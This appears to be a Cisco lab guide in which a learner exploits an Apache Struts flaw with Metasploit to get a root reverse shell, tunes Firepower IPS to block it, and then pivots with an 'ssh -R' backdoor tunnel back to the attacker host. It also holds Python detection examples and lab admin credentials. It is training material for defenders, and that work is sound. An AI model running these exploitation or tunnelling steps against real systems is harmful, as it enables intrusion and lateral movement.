    Once the attack is complete, you will switch to the defender role with the goal of detecting and preventing Mr. Orange from breaching the DMZ server. You will start by accessing the Jumphost and bringing up the Cisco Firepower Management Center. You will develop a basic IPS policy that includes detection for the known Struts exploit. Once the new IPS policy is deployed, Mr. Orange will attempt the Struts exploit again and find that it no longer works. Note that Firepower starts in IDS mode, meaning Mr. Orange's attacks will work until you switch Firepower to IPS mode!

    Note: An IPS is only as effective as the capabilities enabled. Many generic IPS offerings ship with common attack protections, but most enterprise IPS offerings MUST BE MANUALLY TUNED to your environment to protect YOUR potential vulnerabilities rather than what the industry says to watch out for. Cisco Firepower Recommendations automate this tuning: they use host profiling techniques, including passive network observation and integration with patch management systems, to determine where you are vulnerable and which defenses should be enabled. This takes a generic IPS policy and adjusts it closer to what you really want to protect ... your assets!

    This scenario also includes a few bonus exercises. The first bonus exercise walks you through leveraging Firepower Recommendations to auto tune the HackMDs IPS policy. The second bonus exercise briefly covers the value of integrating a dedicated vulnerability scanner such as Rapid7 InsightVM with Cisco Firepower to improve Firepower's understanding of the vulnerabilities that exist in this specific environment. Lastly, an advanced attacker exercise showcases what can happen when an attacker uses an already compromised system as a gateway to pivot deeper into the target's networks.

    Lab Resources

    • Attacker Resource 1: Kali Linux Rolling Edition 2017 (includes Metasploit with default installation)

    • Attacker Resource 2: Ubuntu Server hosting Rapid7 InsightVM

    • Target Resource 1: HackMDs DMZ server running Ubuntu

    • Defender Resource 1: Cisco Firepower Management Center (FMC) Virtual Appliance

    • Defender Resource 2: Cisco Firepower Threat Defense (FTD) Next Generation Firewall (NGFW) Virtual Appliance

    In this lab, Mr. Orange (you) will abuse the Struts vulnerability discovered in scenario 2. First, you will start the exploitation tools, Armitage and Metasploit, to launch your attack. You will configure the exploit with the specific options needed to attack the HackMDs DMZ server. You will then execute the exploit and gain a root command shell on the Hackmds.com web server.

    Maybe This Server Should be Secured at Some Point?

    Launch the Exploit

    Procedure


     1   

    Connect to the Kali Linux server.

     2   

    Open a terminal window by clicking on the terminal emulator icon (second icon from the left) in the favorites bar on the bottom of the desktop. Optionally, you can also find the terminal application by clicking on the magnifying glass at the bottom and searching for the word “terminal”.

     3   

    Before starting Armitage, initialize the Metasploit database by running the command msfdb init in the terminal. If it reports that the database has already been started, that is fine as well.

     4   

    In the terminal window, type the command armitage, and then press Enter.

     5   

    When Armitage starts up, click Connect.

     6   

    You will see a pop-up saying “A Metasploit RPC server is not running or accepting connections yet.” Click Yes to start the RPC server.

     7   

    The Armitage window will show it is connecting to 127.0.0.1:55553. When the program has fully loaded, you will see the msf > prompt in the Console tab at the bottom part of the application window. This can take up to 30 seconds.

     8   

    Verify that Armitage is using the correct database. Click Armitage > Preferences and find the value connect.db_connect.string; the connection string is shown under Value. Then type struts in the search text box above the Console tab. This searches the module database for anything related to Struts. Resize the window if needed.

     9   

    Double-click the exploit named “struts2_content_type_ognl”. The attack window should now be opened for this weaponized exploit. In this window, you can read a description of the exploit and set the configuration options prior to launching it. You can pull down the window to resize if needed.

     10   

    For this exploit, double-click the RHOST (remote host) value field and set it to www.hackmds.com (our target, the HackMDs DMZ web server). Set RPORT (the remote port used to reach the target) to 80 and TARGETURI to /clientportal/fileupload/upload.action. Set VHOST to www.hackmds.com. Finally, check the Use a reverse connection option.

    Note: 
    • You might need to resize or maximize the Attack window to see the Launch button at the bottom of the window.

    • The Use a reverse connection option selects a payload that makes the exploited target open a connection back to the attacker's machine (a reverse shell) instead of the attacker connecting in, which is more likely to get through a firewall that allows outbound traffic. The payload's LHOST/LPORT settings (the attacker's listening address and port) are what this connection uses; the lab's resource script presets them.

     11   

    For this attack, Armitage reads a preconfigured resource script, module4.rc, that presets some of the variables. Optionally, you can open a new terminal by clicking the terminal icon at the bottom of the screen. Then, from the /root directory, run ls to confirm that the file module4.rc exists. To view its contents, run cat module4.rc. An example of the contents of module4.rc is shown below. This file fills in some of the remaining data needed to execute our attack, such as where the local attacker listener is located and which port it uses. It is not necessary to view this file before launching the attack.

     12   

    Now that you have set all the correct parameters, click the Launch button to begin the exploit.

     13   

    This will bring you back to the console where you will see a new window called “exploit” open and see the actual attack log. When you see a red computer monitor icon in the top right window, this means you have successfully exploited the system. Congratulations Mr. Orange, you now have root access to the HackMDs DMZ web server!

     14   

    Now you can interact with the host by spawning a shell session over the reverse session that was opened. To do this, right-click the red monitor and select Shell 1 > Interact. This will open a third window called “Shell 1” to interact with the exploited target system.

     15   

    Running a few commands shows that you have gained full root access to the target server. For example, run whoami, pwd and netstat -rn. Example command output is shown below. Feel free to run other Linux commands such as ls, or others from the Linux cheat sheet provided below.

    Linux Commands Cheat Sheet

    Command            Description
    pwd                Show your current working directory.
    uptime             Show system uptime.
    cd ..              Move up one directory level in the path.
    ls                 List the files in a directory. What is in your folder?
    whoami             Show your username. Wonder who you are logged in as?
    man                Manual for any command. What is ls? Example: man ls
    date               Show the date.
    ls -a              Show all files, including hidden files.
    grep               Narrow in on what you are looking for. Example: grep 192.168.1.1 filename
    ps                 Show a quick snapshot of processes.
    head "filename"    Show the first 10 lines of a file. Example: head joey.pdf
    tail "filename"    Show the last 10 lines of a file. Example: tail joey.pdf

    Note:  This is game over for HackMDs now that Mr. Orange is inside the DMZ network. The attacker could gain a persistent foothold and begin to pivot and compromise other network devices. We showcase this concept in the advanced section at the end of this scenario. You will also see this phase of the attack in scenario 5.
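    Before switching to the defender role, it helps to see what the Struts signatures you are about to enable actually match on. The Metasploit module used above, struts2_content_type_ognl, exploits CVE-2017-5638: the Jakarta multipart parser in Struts 2 evaluated a crafted Content-Type header as an OGNL expression, so the whole attack is visible in one request header. The following is an added example, not code from the lab or from Cisco. It models an inline inspector with the same three rule states as the Firepower rule editor (Disabled, Generate Events, Drop and Generate Events) and the policy-level Drop when Inline switch; the SID, the regular expression and the two sample requests are this example's own constructions, not Talos rules or captured traffic.

```python
"""Added example, not part of the dCloud lab guide or any Cisco code: a toy
inline inspector for the Struts attack used above. struts2_content_type_ognl
exploits CVE-2017-5638, where Struts 2's Jakarta multipart parser evaluated a
crafted Content-Type header as OGNL, so the attack is visible in one header.
The rule, SID and sample requests are this example's own constructions."""
import re
from dataclasses import dataclass

# Constructed sample requests (not captured traffic). The OGNL one mirrors
# the shape of public CVE-2017-5638 payloads; the expression is inert here.
BENIGN_REQUEST = (
    b"POST /clientportal/fileupload/upload.action HTTP/1.1\r\n"
    b"Host: www.hackmds.com\r\n"
    b"Content-Type: multipart/form-data; boundary=----FormBoundary7x\r\n"
    b"Content-Length: 0\r\n\r\n"
)
OGNL_REQUEST = (
    b"POST /clientportal/fileupload/upload.action HTTP/1.1\r\n"
    b"Host: www.hackmds.com\r\n"
    b"Content-Type: %{(#_='multipart/form-data').(#cmd='id')."
    b"(#p=new java.lang.ProcessBuilder(#cmd))}\r\n"
    b"Content-Length: 0\r\n\r\n"
)


@dataclass
class Rule:
    """One signature with the same three states as the Firepower rule
    editor: "disabled", "generate" (Generate Events) or "drop"
    (Drop and Generate Events)."""
    sid: int
    msg: str
    header: str              # request header the pattern is applied to
    pattern: re.Pattern
    state: str = "generate"


RULES = [
    Rule(sid=1000001,        # example-local SID, not a Talos rule id
         msg="SERVER-APACHE Apache Struts OGNL expression in Content-Type header",
         header="content-type",
         pattern=re.compile(rb"%\{|\$\{|#_memberAccess|ProcessBuilder")),
]


def parse_headers(raw: bytes) -> dict:
    """Return {lower-case name: value bytes}; {} if no complete header block."""
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        return {}
    headers = {}
    for line in head.split(b"\r\n")[1:]:     # [0] is the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip()
    return headers


def inspect_request(raw: bytes, rules=RULES, drop_when_inline: bool = True) -> dict:
    """Apply every enabled rule to one request.
    verdict: "pass", "alert" (event only; the request still reaches the
    server, which is what happened while the lab ran in IDS mode) or "drop"
    (requires both rule state "drop" and the policy's Drop when Inline)."""
    headers = parse_headers(raw)
    events, verdict = [], "pass"
    for rule in rules:
        if rule.state == "disabled":
            continue
        value = headers.get(rule.header)
        if value is None or not rule.pattern.search(value):
            continue
        events.append((rule.sid, rule.msg))
        if rule.state == "drop" and drop_when_inline:
            verdict = "drop"
        elif verdict != "drop":
            verdict = "alert"
    return {"verdict": verdict, "events": events}


def set_state(rules, keyword: str, state: str) -> int:
    """Bulk state change like filter-then-select in FMC; returns match count."""
    matched = [r for r in rules if keyword.lower() in r.msg.lower()]
    for r in matched:
        r.state = state
    return len(matched)


if __name__ == "__main__":
    print("IDS mode :", inspect_request(OGNL_REQUEST, drop_when_inline=False))
    set_state(RULES, "struts", "drop")
    print("IPS mode :", inspect_request(OGNL_REQUEST))
    print("benign   :", inspect_request(BENIGN_REQUEST))
```

    The two conditions in inspect_request are the two things you change in the defender section: the rule state per signature, and Drop when Inline for the whole policy. Either one alone leaves the request at "alert", which is exactly the IDS behaviour Mr. Orange just exploited.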

    Defend Web Resources with Intrusion Prevention

    It is time to defend against this and other attacks using Cisco Firepower. In this exercise, we will identify the attack Mr. Orange just launched and adjust the intrusion policy from detection only (IDS) to prevention (IPS). We will also search the Firepower console to identify which systems are vulnerable and validate that Firepower Recommendations flagged our vulnerable DMZ server as something the IPS should tune itself to. Let the fun begin!

    Procedure


     1   

    On the jumphost (not kali attack server), open a web browser and access the Firepower manager by using the Firepower tab or https://192.168.30.5/.

     2   

    Log in with the username admin and password C1sco12345.

    Note: If you receive a message stating that “Existing Session Detected,” click the Proceed button to continue.
     3   

    This will take you to the Summary Dashboard with a focus on threats. Imagine you are now an administrator logging in and finding that you have a major breach. For this exercise, we will look at the IPS rules: Click the Intrusion Events tab.

     4   

    Here, you will see the top attackers, which in this case is Mr. Orange’s IP address seen as 198.18.133.6. Now click the 198.18.133.6 IP address to investigate the attack.

     5   

    You will now see the details of the attack. As you can see, Firepower identified that the Struts vulnerability on your Apache server was attacked. To the right, you will see the priority and the attack classification. Anything at a high level like this should be investigated and dealt with.

     6   

    To see even more details, click one of the classification entries, such as Attempted Administrator Privilege Gain. This shows the impact level of the threat, source, destination and other details. This again is a high priority, impact level 1 or 2 threat, meaning you must take care of it. Now it is time to turn our IDS into an IPS.

    Note: Default Firepower IPS policies would automatically prevent this and other attacks. We manually disabled Firepower defenses by adjusting the default IPS rules to prove the concept of the attack! You can see that no action was taken because the Inline Result column shows no action.
     7   

    On the top tab area, click the Policies tab, select the Access Control drop down and then select Intrusion menu option to view the IPS policies.

     8   

    You will notice a policy exists called Hack MDs Default IPS Policy. We will be modifying this policy. Click the pencil icon to edit it; scroll all the way to the left of the row if needed.

     9   

    Modify the IPS policy by selecting the Drop when Inline checkbox under Policy Information, then click the Rules menu. Drop when Inline is the policy-level switch: without it, rules set to Drop and Generate Events still only generate events.

    Note:  Some IDS/IPS solutions offer a simple on/off button for IPS mode. This limits the protection offered to whatever the vendor feels is important, without considering what is on your network. This is typically referred to as IPS lite and is not what you want when securing a network containing critical assets!
     10   

    You will find thousands of rules available for your cyber defense. The challenge is figuring out which ones to enable that best fit your environment. In this example, we manually identify all the rules for Struts attacks. Search for the word struts using the filter search box to show only the Struts rules. Make sure you press Enter to apply the filter.

    Note:  Cisco Talos continuously updates the available signatures based on the latest threats seen in the wild.
    Note:  Notice that an enterprise grade IDS/IPS solution offers more signatures than you could ever enable. Enabling every signature would turn the security appliance into a brick, meaning it could no longer keep up with traffic, because there are simply TOO MANY vulnerabilities that could exist on a network. Best practice is to tune your IPS to the rules that matter for your network security policy and environment. We will do this later in this lab.
     11   

    The Filter returned around 56 results so now change all of these from Generate Events to Drop and Generate Events. First select the checkbox on the top left so all Struts rules are selected.

     12   

    Click the Rule State and choose to Drop and Generate Events.

     13   

    When Firepower confirms it has Successfully set the rule state for 56 rule(s), click OK to continue.

     14   

    Notice that each Struts rule now has an X, indicating the rules have been configured to Drop and Generate Events.

     15   

    Click Policy Information to go back to the main rule page.

     16   

    You must now commit these changes by clicking the Commit Changes button. You will then be prompted for an optional Description of Changes; click OK.

    Note: When trying to commit the changes, if the Firepower Management Center (FMC) generates an EOS Store Failed message, then logout and then log in back into FMC console. Now go back and commit the changes.
     17   

    You will notice that we have saved and committed the changes, but we will still need to deploy the changes from the Firepower Management Center (FMC) to the Firepower Threat Defense (FTD) next generation firewall. To do this, click the Deploy button.

     18   

    Now you need to select the Firepower solution to deploy this new configuration to. Select the checkbox next to the device named “ftd” and select the Deploy button to deploy this new IPS configuration.

     19   

    You will be asked to confirm the deployment. Click Deploy. You will see the process start, and the window will close once the configuration job is kicked off.

     20   

    To check the status of the Firepower manager pushing the configuration to the Firepower appliance, click the exclamation point within the red circle icon. The status is shown as a percentage completed. The deployment takes several minutes to complete.

     21   

    After a few minutes, you should see the status change from red to green, along with an explanation that the new policy is now deployed and configurations are up to date.

     22   

    Now we need to review the Firewall’s Access Policy. From the Policies tab at the top, select the Access Control dropdown, but this time select the Access Control item from the list.

     23   

    You will see the network policy used by HackMDs called HackMDs Default Policy. Click the pencil icon all the way to the right to view and edit the HackMDs Default Policy.

     24   

    Next, we will edit the first rule in the Access Policy called Default Rule by clicking the pencil icon as shown below.

    This will bring up the Edit Rule – Default Rule window for this access control policy rule.

    Notice all the tab menu options for controlling several types of policy access.

    The example below shows the menu options.

    Note:  The following three pages provide reference information. To continue with the lab, you can skip to step 2 in the Smash and Grab: Attack Public Network Services through the Front Door (continued) topic.

    Reference Information (optional to cover in lab)

    This section is for your information and reference. To skip it, go to step 1 in Scenario 3 Smash and Grab: Attack Public Network Services through the Front Door (continued).

    Zones: Groups of networks you defined such as your DMZ.

    Networks: Network objects such as the entire inside network subnet.

    Note: 
    • VLAN Tags: VLANs

    • Customers with proxy solutions could benefit from Firepower due to Firepower being an Application Layer firewall and protecting ports that are not protected by Proxies.

    Users: User groups that can be pulled from sources such as Active Directory. You can apply policies to specific users or groups such as only contractors.

    Applications: These are the thousands of applications you can apply rules to. For example, the next image shows searching Facebook and seeing the many options to control within Facebook since Firepower is an application layer firewall. FYI this comes with the default Firepower license.

    Note: It is important to be aware that filtering websites is not security but policy enforcement. We are filtering a few things such as adult material in another access control policy within this lab.

    Ports: Specific port controls such as FTP or Bit torrent. Again, this comes with the default Firepower licenses.

    Note: Proxy solutions typically only see specific ports such as 80 and 443. This means other ports, such as those used by BitTorrent traffic, would be missed. Application layer firewalls like Firepower Threat Defense (FTD) see all ports and protocols, giving them a complementary value to any proxy based technology.

    URLs: These are the hundreds of thousands of websites that you can apply policies to. They are categorized on the left based on industry labeling. Note that this requires the URL license for Firepower, meaning you will receive a continuous feed from Cisco Talos on the latest websites and their associated risk.

    SGT/ISE Attributes: This is an integration option with the Cisco Identity Services Engine (ISE) that is covered in scenario 7.

    Scenario 3 Smash and Grab: Attack Public Network Services through the Front Door (continued)

    Procedure


     1   

    The access policy’s Default Rule is already set to the action of Allow.

     2   

    Next, click the Inspection tab of the Default Rule. Notice the Intrusion Policy is also already assigned. Now you are ready to see if the defense can hold up Mr. Orange’s web-based attack.

    At this point, you have enabled the IPS capabilities within the HackMDs Firepower solution. Now you are ready to attempt the same exploit used by Mr. Orange in the previous exercise and see if Cisco Firepower will prevent the vulnerable DMZ from being exploited. Round two … fight!


    Validate the Attack No Longer Works

    Note:  You are repeating the attack from Mr. Orange.

    Procedure


     1   

    Go back to the Kali Linux attacker workstation (First tab in the Firefox browser session).

     2   

    You will need to remove the existing host that you compromised before executing the attack a second time. Right-click the host, select Host and click Remove Host. Once the host disappears, click the X next to the Shell 1 and exploit tabs to close the existing attack windows.

     3   

    You should now have a clean Armitage screen. If needed, search for the keyword “struts” again to filter the exploits.

     4   

    Double-click the exploit named struts2_content_type_ognl.

     5   

    Once again, repeat the steps to launch the exploit. The following image shows the details you need to enter.

     6   

    Set the correct parameters, and then click the Launch button to begin the exploit.

     7   

    It’s time to launch the attack! You will launch an attack against a fully-armed Firepower appliance.

    Result: The example below shows that the attack attempted will not be successful.
    Note:  At this point, you have successfully defended your network against Mr. Orange and other remote attackers. With Firepower Recommendations enabled, Firepower will also continue to adjust the policy as new internal vulnerabilities are discovered.
     8   

    Notice that this time you did not get the red monitor in the top right window. This means the attack did not work. The newly deployed intrusion policy is now blocking it. Sorry, Mr. Orange, ACCESS DENIED!

     9   

    Go back to your Firepower manager and click the Analysis tab, select Intrusions menu, and then choose Events.

     10   

    You should once again see the events that were triggered by the attack and then blocked by the Firepower IPS policy.

     11   

    Since you recently initiated the attack, change the time window of displayed events to 1 hour. Do this by clicking the current time window in the upper right portion of the screen above the word Static. An Events Time Window dialog will appear. Click 1 hour, then click Apply. See the screenshots below for details.

    Note: It may take a minute for Firepower to show these attacks.

     12   

    Scroll to the bottom of the page and click the View All button. All events from the last hour will be displayed. Look for events from the Kali Linux host with source IP 198.18.133.6. This time you will notice the Inline Result shows the packet was dropped, meaning the attack was blocked because the policy is now in IPS mode. It may take a few minutes for this attack to show in the recent event logs.

     13   

    Note that Firepower can also identify vulnerabilities in any system on the network. Consider this a proactive way to identify vulnerable systems such as your Apache system that was targeted by Mr. Orange. This lets you adjust your security based on your weakest areas. To view this, click the Analysis tab, select Hosts and Network Map.

     14   

    This will bring up the hosts discovered on the networks. Expand the Hosts [IPv4] list by clicking on the [+] icons until you reach the IP addresses found under 198.19.20.x DMZ network.

     15   

    Click IP address 198.19.20.5 to see additional details for this host that represents the DMZ recently compromised. You can see details within the Indication Of Compromise section.

     16   

    Scroll down and notice that the Struts vulnerabilities are identified by both Firepower and Rapid7's InsightVM. You can have Firepower generate recommendations whenever it identifies such vulnerabilities to ensure your IPS is effective at defending your network. We will look at this concept later in the section titled "Bonus Lab - Tuning the Firepower NGIPS".

    Note:  Many vendors offer IPS technology that includes periodic updates for protection enabled out of the box. Be aware that a vendor can’t know what is on your network and can only enable a certain number of signatures before overwhelming the processing power of the device. This makes it challenging to provide a set of recommended signatures for every different environment. Therefore, the best practice is to tune your IPS to your environment, so it protects your assets with their own unique vulnerabilities.

    Rapid7 InsightVM Integration with Cisco Firepower: Overview

    It is common for security operation centers (SOCs) to leverage a vulnerability scanner to identify weaknesses within systems on their network. As you saw in this lab, it’s helpful for security defense solutions to be aware of vulnerabilities they are supposed to protect.

    This helps solutions like IDS/IPS have the proper settings enabled. Cisco Firepower has its own passive vulnerability detection; however, Firepower can also leverage other vulnerability scanners. An example is using vulnerability data from an industry leader in vulnerability scanning, Rapid7.

    In this next section, we will walk through how Firepower can import vulnerability data from Rapid7's InsightVM. This can be done manually or automatically depending on your preference. It is common to push vulnerability data from InsightVM to Cisco Firepower automatically at least once a day to ensure the data is kept current.

    Procedure


     1   

    From the Analysis tab, look in the Hosts column and click Third-Party Vulnerabilities.

    Note:  The Vulnerabilities option would bring up the results from Cisco Firepower’s passive vulnerability analysis. These vulnerabilities do not require any integration with other products and are a feature that comes with a default Firepower manager deployment.
     2   

    Select NeXpose (the former product name of InsightVM) to investigate the vulnerabilities it has identified.

     3   

    This will bring up any active systems seen with vulnerabilities found by InsightVM. In the next example, there are many, ranked by the number of devices found with each vulnerability, as shown in the Count column.

     4   

    You can get a quick summary of any vulnerability by clicking the magnifying glass icon. In this example, we clicked to see details about the Traffic Amplification vulnerability. Feel free to pick any of the vulnerabilities you see in your lab.

     5   

    Click a vulnerability to see all the systems impacted by it. Notice we can see the CVE ID, which is the industry standard way vulnerabilities are referenced across vendors. You can also see the Cisco Snort ID, meaning which Snort rules are designed to detect attacks against this vulnerability. Some vulnerabilities may not have this data: there may be no Snort rule for the threat yet, or the industry may not have assigned a CVE to it. In this example, there is no bug tracker ID. Let's click one of the systems to pull up details about that specific computer. We can see the host profile by right-clicking the IP and selecting the Host Profile option.

     6   

    Here, we can see details on this specific system including the type of system, who is logged in, recent compromises and so on. Your results may be slightly different from this example depending on the vulnerability you have selected.

     7   

    Scroll down to see the option to view all the vulnerabilities found on this system by InsightVM.

     8   

    Click any of these to bring up the description of what it is, its severity ranking, official CVSS score and so on. Also notice that you can see which ports are associated with each vulnerability. This type of detail is critical for a vulnerability management practice. It is also important for improving cyber security defense technologies such as your IDS/IPS, which is supposed to protect you from having your vulnerabilities exploited by attackers!

    It is also important to highlight that many reported vulnerabilities are not real threats in a given environment.

    Penetration testing is important in evaluating whether an attacker could abuse a vulnerability. It is extremely important that your security defense technology knows about potential vulnerabilities--so you are protected while your team decides how to proceed with reducing the risk caused by a vulnerable system.

    The valuable vulnerability data identified by Rapid7 InsightVM can improve tuning the Cisco Firepower IDS/IPS signatures when imported. We will learn more about that concept in the next exercise.

    Congratulations! You have now completed Scenario 3. If time permits, you can continue with the Scenario 3 Bonus section that follows.


    Bonus Lab - Tuning the Firepower NGIPS

    Procedure


     1   

    Go back to our IPS policy by clicking the Policies tab at the top, selecting Access Control > Intrusion.

     2   

    You should see the policy you previously modified – Hack MDS Default IPS Policy. Click the edit pencil icon.

     3   

    Right now, you have selected a ton of security signatures that Cisco recommends for all customers to consider. Firepower will have other recommendations for us based on the HackMDs network topology and hosts. On the left, select Firepower Recommendations. Next, in the Firepower Recommended Rules Configuration window, click the Advanced Settings option to adjust the security level at which recommendations are automatically enforced.

     4   

    This will open a bar showing a slider for the security level you want Firepower’s recommendations to use when choosing signatures. You can go with Medium or tune it either higher or lower. Also, notice the Accept Recommendations to Disable Rules. This works by having Firepower identify when you have rules for applications or services that it has never seen on the network. This is helpful to keep the system functioning as fast as possible by removing unnecessary checks. If you leave this checked for our lab environment, you will find Firepower will auto disable most signature rules since we have a limited number of devices on the network.

     5   

    Now, click Generate, and then select Use Recommendations.

     6   

    After a few minutes, you will see which rules were enabled and which were disabled based on the hosts and traffic Firepower observed on the network it is protecting.

     7   

    In this example, the Firepower Management Center (FMC) enabled 11418 new rules to generate events (monitor), enabled 0 rules to drop and generate events and finally disabled 6423 rules (your exact numbers might vary based on additional Talos signature updates that have been applied to your appliance). That is a huge difference between what a new default out-of-the-box IPS policy would have deployed. Imagine all the people using generic IPS policies and having this level of gap between what a policy should look like for their network environment!

     8   

    You can view additional details of what was added or removed by clicking the eye icon on the right of any of the three changes (new monitor, drop or disabled rules). In this example, click the view eye icon for the “Set 11418 rules to generate events” to see what new signature rules have been applied to generate events.

    You will find a ton of new rules that are specific to this environment. A rule may be added because Firepower's passive vulnerability detection saw something at risk, a server was newly seen, an application was identified on a host, and so on. In this example, Chrome browsers are in use, so defenses for Chrome have been added.

     9   

    For lab purposes, we will NOT commit to these changes. Click “Do Not Use Recommendations” button.

    Note:  In a real operation, you could move forward with what was recommended. You could also manually review and move forward with specific threat categories or vulnerabilities that impact critical systems.

    Advanced Lab – Pivoting [Advanced]

    Note: This is an advanced lab. While dCloud will try to support all labs, this one has been designed for advanced users. Keep this in mind while working through it.

    Once an attacker gains access to a compromised device on a network, their typical next step is to pivot and attack other devices inside the network. There are many different methods attackers use to accomplish internal pivoting. In this advanced lab, we will use SSH port forwarding to route our traffic through the existing remote shell (the compromised DMZ server) in order to pivot and attack additional devices inside the target network. Let’s get started.

    Procedure


     1   

    Open a terminal window on the Kali attack system.

     2   

    At the command prompt, run the command: ssh-keygen.

     3   

    Set the key file to: /root/.ssh/attack

     4   

    You may be asked if you want to overwrite. If so, select Y.

     5   

    Press Enter for the rest of the prompts.

     6   

    Next, copy the “attack.pub” public key file to the “authorized_keys” file.

    cp /root/.ssh/attack.pub /root/.ssh/authorized_keys
     7   

    Next, update the Linux permissions on the “authorized_keys” file.

    chmod 400 /root/.ssh/authorized_keys
    Note:  chmod 400 grants the owner (u) read permission only and removes all group and other permissions. ssh refuses to load a private key that is readable by group or others, so this step matters for the key file as well.
     8   

    Copy the “attack” private key file to your home directory.

    cp /root/.ssh/attack /root/attack
     9   

    Now we need to upload our key to the target system. Before you do this, you will once again have to make the DMZ server vulnerable so that the attack successfully exploits it. Let’s first turn Cisco Firepower back into an IDS by disabling blocking.

     10   

    Go back to your Cisco Firepower management console Firefox browser session. Modify the Firepower IPS policy by clicking the Policies tab at the top and selecting Access Control > Intrusion.

     11   

    Click the pencil to Edit the policy.

     12   

    Next, from the Policy Information settings, uncheck the Drop when Inline check box and then click Rules.

     13   

    Type Struts in the filter window, check the checkbox, and then select Generate Events. The IPS policy will no longer drop the identified Struts attacks; it will only generate events for them.

     14   

    Click the Policy Information tab, click Commit changes to save the configuration.

     15   

    Finally, click the Deploy button, select the ftd server, and select Deploy to push the changes. Verify that the deployment succeeded using the task monitoring (!) icon.

     16   

    Now, let’s go back to the Kali Linux system and exploit the DMZ server again using the struts2 attack. Close and then open a new instance of Armitage.

     17   

    Open a terminal window, and type Armitage to run the attack software. Within Armitage, type struts2 and select the struts2_content_type_ognl attack. Fill out the window that pops up, and click Launch.

     18   

    You should once again see the exploited DMZ server represented as a computer with lightning striking it. Let’s use this compromised system as a point to pivot deeper into the HackMDs environment.

     19   

    Right-click the compromised system, and then select Shell 1 > Interact to open an interactive terminal on the compromised system.

     20   

    Type cd webapps to open a web application folder.

     21   

    Now, we will load an attack payload. Right-click the compromised machine and select shell > upload.

     22   

    Select the attack private key file and choose to Open to upload this payload.

     23   

    From the Shell 1 tab, you can validate that the “attack” private key file has been properly uploaded. Type ls to show the files listed under the root directory. You should see the attack file. If you do not have a shell, right-click the exploited system and once again select to Interact with the system.

     24   

    Next, we need to modify the permissions to the file. Use the command chmod 400 attack.

    chmod 400 attack
     25   

    Move this file to /tmp/attack by running mv attack /tmp/.

     26   

    You may see an error stating Permission denied because the file already exists. If that is the case, or if you want to verify that the file was moved correctly, type cd /tmp/ to enter that folder, then type ls to see that the file is now there or was already there. The following example shows the case where the file already exists.

     27   

    Now we can build our tunnel back from the remote system by running the following command on the remote system. Everything is case-sensitive. Accuracy is critical.

    ssh -i /tmp/attack -l root 198.18.133.6 -p 22 -N -f -C -R 445:198.19.10.1:445 -o StrictHostKeyChecking=no

    Here -N runs no remote command, -f sends ssh to the background, -C enables compression, and -R 445:198.19.10.1:445 makes port 445 on the Kali host forward through the DMZ server to port 445 on 198.19.10.1; StrictHostKeyChecking=no skips the host key prompt that would otherwise stall the non-interactive session. This forward is why the psexec module later targets RHOST 127.0.0.1.

     28   

    You can verify the tunnel is up by jumping back to the Kali system terminal window (not in Armitage) and running netstat -tunap | grep 22. You should see an established connection on port 22.
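    The same netstat view, turned around to the defender’s side: once the tunnel is up, the DMZ server holds an outbound SSH session to an outside address, something a web server in a DMZ has no reason to do. The following Python is an added example, not code from the lab or from any Cisco product; it parses constructed netstat -tunap output (the 198.19.20.10 DMZ server address and the 198.19.0.0/16 internal range are assumptions, the other addresses come from the text) and reports established sessions to port 22 outside the internal range.

```python
import ipaddress

# Constructed sample of `netstat -tunap` output as it could look on the DMZ
# web server after the tunnel is up; it was not captured from the lab.
# 198.18.133.6 is the lab's Kali host and 198.19.10.1 its AD server (both
# from the text); the DMZ server address 198.19.20.10 is assumed.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      1337/java
tcp        0      0 198.19.20.10:8080       198.18.133.6:51234      ESTABLISHED 1337/java
tcp        0      0 198.19.20.10:40422      198.18.133.6:22         ESTABLISHED 4120/ssh
tcp        0      0 198.19.20.10:46010      198.19.10.1:445         TIME_WAIT   -
udp        0      0 0.0.0.0:68              0.0.0.0:*                           612/dhclient
"""

# Address space treated as "inside" (assumed; the internal hosts named in
# this section all sit in 198.19.0.0/16).
INTERNAL_NETS = [ipaddress.ip_network("198.19.0.0/16")]


def _split_addr(addr):
    """'198.19.20.10:40422' -> ('198.19.20.10', '40422'); the bare '*'
    port netstat prints for unconnected sockets is returned as-is."""
    host, _, port = addr.rpartition(":")
    return host, port


def parse_netstat(text):
    """Return one dict per socket line of `netstat -tunap` output."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or not parts[0].startswith(("tcp", "udp")):
            continue  # banner and header lines
        proto = parts[0]
        local_host, local_port = _split_addr(parts[3])
        foreign_host, foreign_port = _split_addr(parts[4])
        if proto.startswith("tcp"):
            state = parts[5]
            pidprog = parts[6] if len(parts) > 6 else "-"
        else:  # UDP lines carry no State column
            state = ""
            pidprog = parts[5] if len(parts) > 5 else "-"
        pid, _, program = pidprog.partition("/")
        rows.append({
            "proto": proto, "local_host": local_host, "local_port": local_port,
            "foreign_host": foreign_host, "foreign_port": foreign_port,
            "state": state, "pid": pid if program else "", "program": program,
        })
    return rows


def is_internal(host, nets=INTERNAL_NETS):
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:  # '*', hostnames and the like are not addresses
        return False
    return any(ip in net for net in nets)


def find_outbound_ssh(text, nets=INTERNAL_NETS):
    """Established TCP sessions this host opened to port 22 on an address
    outside `nets`. Direction matters: the inbound exploit session on 8080
    has the service port on the local side and is not reported, while the
    reverse tunnel is an outbound session with 22 on the foreign side."""
    return [
        r for r in parse_netstat(text)
        if r["proto"].startswith("tcp")
        and r["state"] == "ESTABLISHED"
        and r["foreign_port"] == "22"
        and not is_internal(r["foreign_host"], nets)
    ]


if __name__ == "__main__":
    for hit in find_outbound_ssh(SAMPLE_NETSTAT):
        print(f"ALERT outbound ssh from {hit['local_host']} to "
              f"{hit['foreign_host']} pid={hit['pid']} ({hit['program']})")
```

    Run against the sample, it reports only the ssh process holding the session to 198.18.133.6; the same rule applied to NetFlow or firewall connection logs from the DMZ segment is the network-side equivalent.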

     29   

    Now that we have our tunnel, i.e. our “backdoor”, built, we can run additional attacks over this connection against the target network. Think of this as our pivot point, meaning we can now attack other systems within the network through this compromised system from anywhere in the world! Let’s go back to Armitage and start our next layer of attack!

     30   

    Within Armitage, click the console tab to bring up the Metasploit CLI interface within Armitage.

     31   

    Now, we are going to load up our next attack. Use the following commands to set up and execute the attack.

